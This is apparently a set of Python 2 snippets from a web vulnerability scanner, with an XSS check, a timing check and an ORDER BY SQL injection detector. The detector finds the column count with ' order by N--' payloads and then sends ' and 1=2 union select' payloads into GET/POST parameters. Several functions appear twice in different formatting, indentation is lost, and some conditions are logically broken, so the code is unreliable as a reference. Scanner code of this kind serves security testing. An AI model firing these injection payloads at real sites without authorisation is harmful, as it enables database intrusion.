def __check_if_rsp_stable_on_orig_input():
p = get_request(url = url, allow_redirects=False)
if p.status != '200':
is_timing_stable = False
orig_first_time = p.elapsed
orig_first_resp_body = p.data
time.sleep(2)
p = get_request(url = url, allow_redirects=False)
if p.status != '200':
is_timing_stable = False
orig_second_time = p.elapsed
orig_second_resp_body = p.data
min_resp_time = min(orig_first_time, orig_second_time)
max_resp_time = max(orig_first_time, orig_second_time)
short_duration = max(RSP_SHORT_DURATION, max_resp_time) + 1
long_duration = short_duration * 2
if (max_resp_time - min_resp_time) > short_duration:
is_timing_stable = False
else:
is_timing_stable = True
if orig_first_resp_body != orig_second_resp_body:
is_timing_stable = False
def run(self, info):
#if not info.has_url_params and not info.has_post_params:
# return
m_return = []
#TODO 30X redirect
#TODO Content-Type
p = get_request(url=info, allow_redirects=False)
if (p.status == '301'
or p.status == '302') and not p.headers.get('Location'):
return m_return
if p.content_type is not None and re.search(
'(application\/json)|(application\/javascript)|(text\/json)|(text\/javascript)|'
'(application\/x-javascript)|(application\/octet-stream)|(text\/xml)|(application\/xml)',
p.content_type) is not None:
return m_return
m_url = info
if info.has_url_params:
for k, v in m_url.url_params.iteritems():
key = to_utf8(k)
value = to_utf8(v)
if self.xss_detect(m_url, method='GET', k=key, v=value):
url = URL(url=m_url.url,
method='GET',
post_params=None,
referer=m_url.referer)
vul = XSS(url,
vulnerable_params={"injection": "xxxxxx"},
injection_point=XSS.INJECTION_POINT_URL,
injection_type="XSS")
vul.description += "f**k"
m_return.append(vul)
break
#return m_return
if info.has_post_params:
print 'POST'
# Send the results
return m_return
def run(self, info):
#if not info.has_url_params and not info.has_post_params:
# return
m_return = []
#TODO 30X redirect
#TODO Content-Type
p = get_request(url = info, allow_redirects=False)
if (p.status == '301' or p.status == '302') and not p.headers.get('Location'):
return m_return
if p.content_type is not None and re.search('(application\/json)|(application\/javascript)|(text\/json)|(text\/javascript)|'
'(application\/x-javascript)|(application\/octet-stream)|(text\/xml)|(application\/xml)', p.content_type) is not None:
return m_return
m_url = info
if info.has_url_params:
for k,v in m_url.url_params.iteritems():
key = to_utf8(k)
value = to_utf8(v)
if self.xss_detect(m_url, method = 'GET', k = key, v = value):
url = URL(url = m_url.url,
method = 'GET',
post_params = None,
referer = m_url.referer)
vul = XSS(url, vulnerable_params = {"injection":"xxxxxx"}, injection_point = XSS.INJECTION_POINT_URL, injection_type = "XSS")
vul.description += "f**k"
m_return.append(vul)
break
#return m_return
if info.has_post_params:
print 'POST'
# Send the results
return m_return
def get_original_time():
p = get_request(url = url, allow_redirects= False)
return p.elapsed
def _orderby_sql_detect(self, **kwargs):
'''
order by 注入
:param kwargs:
:return:
'''
k = kwargs.get("k", None)
if k is None or not isinstance(k, str):
raise ValueError("Except param has not key!")
v = kwargs.get("v", None)
url = kwargs.get("url", None)
if url is None or not isinstance(url, URL):
raise ValueError("Except param has not req_uri")
method = kwargs.get('method', None)
max_bound = 100
min_bound = -1
lower_index, high_index = 0, max_bound
table_column = 0
max_order_column_payload = ' order by {0}--'.format( max_bound )
min_order_column_payload = ' order by {0}--'.format( min_bound )
p = get_request(url = url, allow_redirects = False)
if p.status != '200' and p is None:
return False
orig_resp_body = p.data
max_order_column_payload_rsp = None
min_order_column_payload_rsp = None
try:
max_order_column_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':max_order_column_payload, 'type': 0}, bmethod = method).data
min_order_column_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':min_order_column_payload, 'type': 0}, bmethod = method).data
except AttributeError:
return False
if max_order_column_payload_rsp != None and min_order_column_payload_rsp != None and (orig_resp_body != max_order_column_payload_rsp) and (orig_resp_body == min_order_column_payload_rsp):
#maybe exist sql_inject
while lower_index <= high_index:
#二分法
col = int(math.ceil( (lower_index + high_index) / 2))
column_payload = ' order by {0}--'.format(col)
column_payload_rsp = None
try:
column_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':column_payload, 'type': 0}, bmethod = method, use_cache = False).data
except AttributeError:
pass
if column_payload_rsp != None and column_payload_rsp != orig_resp_body:
high_index = col
else:
if (lower_index + 1) == high_index:
table_column = lower_index
break
elif lower_index == high_index:
table_column = high_index
break
lower_index = col
if table_column != 0:
Logger.log_verbose("%s maybe has order by inject!" % url.url)
for inject_index in range(table_column):
union_list = [x+1 for x in range(table_column)]
union_list[inject_index] = ORDER_BY_SIGN
union_payload = ' and 1=2 union select {0}'.format(','.join(map(str,union_list)))
union_payload_rsp = None
try:
union_payload_rsp = payload_muntants(url_info = url, payload = {'k': k , 'pos': 1, 'payload':union_payload, 'type': 0}, bmethod = method, use_cache = False).data
except AttributeError:
pass
if union_payload_rsp != None and ORDER_BY_MD5_VAL in union_payload_rsp:
return True
return False
def payload_muntants(url_info, payload = {}, bmethod = 'GET', exclude_cgi_suffix = ['css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg', 'txt'],
use_cache = None, timeout = 10.0 , bcheck_use_orig_body = True, req_header = {},
resp_code = '200', resp_header = {}, **kwargs):
'''
:param url_info:
:param payload: {'k':'id', 'pos': 1, 'payload':str, 'type': 0} (pos:0 key, pos:1 value) (type:0 append, type:1 replace)
:param exclude_cgi_suffix:
:param depth:
:param bcheck_use_orig_body:
:param req_header:
:param resp_code:
:param resp_header:
:param kwargs:
:return:
'''
if not isinstance(url_info , URL):
raise TypeError("Expected url object, type:%s" % type(url_info))
if not isinstance(payload, dict):
raise TypeError("Excepted payload object, type:%s" % type(payload))
if url_info.parsed_url.extension[1:] in exclude_cgi_suffix:
Logger.log_verbose("Skipping URL: %s" % url_info.url)
m_url_info = copy(url_info)
if bmethod == "GET":
param_dict = copy(m_url_info.url_params)
elif bmethod == "POST":
param_dict = copy(m_url_info.post_params)
if len(param_dict) == None and len(param_dict) == 0:
return None
__ = parse_url(m_url_info.url)
k = payload['k']
if payload['pos'] == 1:
#value
if payload['type'] == 0: #append
param_dict[k] = param_dict[k] + payload['payload']
elif payload['type'] == 1: #replace
param_dict[k] = payload['payload']
else:
#key 先不考虑key值
if payload['type'] == 0:
param_dict.update(k = param_dict.pop(k))
# TODO GET/POST param key need deal
raise ValueError("GET/POST param key payload is not support!")
retry_cnt = 0
while retry_cnt < 3:
if bmethod == "GET":
m_resource_url_payload = URL(url = __.request_cgi, method = m_url_info.method, referer = m_url_info.referer, url_params= param_dict)
elif bmethod == "POST":
m_resource_url_payload = URL(url = __.request_cgi, method = m_url_info.method, referer = m_url_info.referer, post_params= param_dict)
try:
p = get_request(url = m_resource_url_payload, allow_redirects=False, use_cache = use_cache, timeout = timeout)
return p
except NetworkException, e:
retry_cnt += 1
time.sleep(0.5)
Logger.log_error_verbose("Error while processing %r: %s" % (m_resource_url_payload.url, str(e)))
def payload_muntants(url_info,
payload={},
bmethod='GET',
exclude_cgi_suffix=[
'css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg', 'txt'
],
use_cache=None,
timeout=10.0,
bcheck_use_orig_body=True,
req_header={},
resp_code='200',
resp_header={},
**kwargs):
'''
:param url_info:
:param payload: {'k':'id', 'pos': 1, 'payload':str, 'type': 0} (pos:0 key, pos:1 value) (type:0 append, type:1 replace)
:param exclude_cgi_suffix:
:param depth:
:param bcheck_use_orig_body:
:param req_header:
:param resp_code:
:param resp_header:
:param kwargs:
:return:
'''
if not isinstance(url_info, URL):
raise TypeError("Expected url object, type:%s" % type(url_info))
if not isinstance(payload, dict):
raise TypeError("Excepted payload object, type:%s" % type(payload))
if url_info.parsed_url.extension[1:] in exclude_cgi_suffix:
Logger.log_verbose("Skipping URL: %s" % url_info.url)
m_url_info = copy(url_info)
if bmethod == "GET":
param_dict = copy(m_url_info.url_params)
elif bmethod == "POST":
param_dict = copy(m_url_info.post_params)
if len(param_dict) == None and len(param_dict) == 0:
return None
__ = parse_url(m_url_info.url)
k = payload['k']
if payload['pos'] == 1:
#value
if payload['type'] == 0: #append
param_dict[k] = param_dict[k] + payload['payload']
elif payload['type'] == 1: #replace
param_dict[k] = payload['payload']
else:
#key 先不考虑key值
if payload['type'] == 0:
param_dict.update(k=param_dict.pop(k))
# TODO GET/POST param key need deal
raise ValueError("GET/POST param key payload is not support!")
retry_cnt = 0
while retry_cnt < 3:
if bmethod == "GET":
m_resource_url_payload = URL(url=__.request_cgi,
method=m_url_info.method,
referer=m_url_info.referer,
url_params=param_dict)
elif bmethod == "POST":
m_resource_url_payload = URL(url=__.request_cgi,
method=m_url_info.method,
referer=m_url_info.referer,
post_params=param_dict)
try:
p = get_request(url=m_resource_url_payload,
allow_redirects=False,
use_cache=use_cache,
timeout=timeout)
return p
except NetworkException, e:
retry_cnt += 1
time.sleep(0.5)
Logger.log_error_verbose("Error while processing %r: %s" %
(m_resource_url_payload.url, str(e)))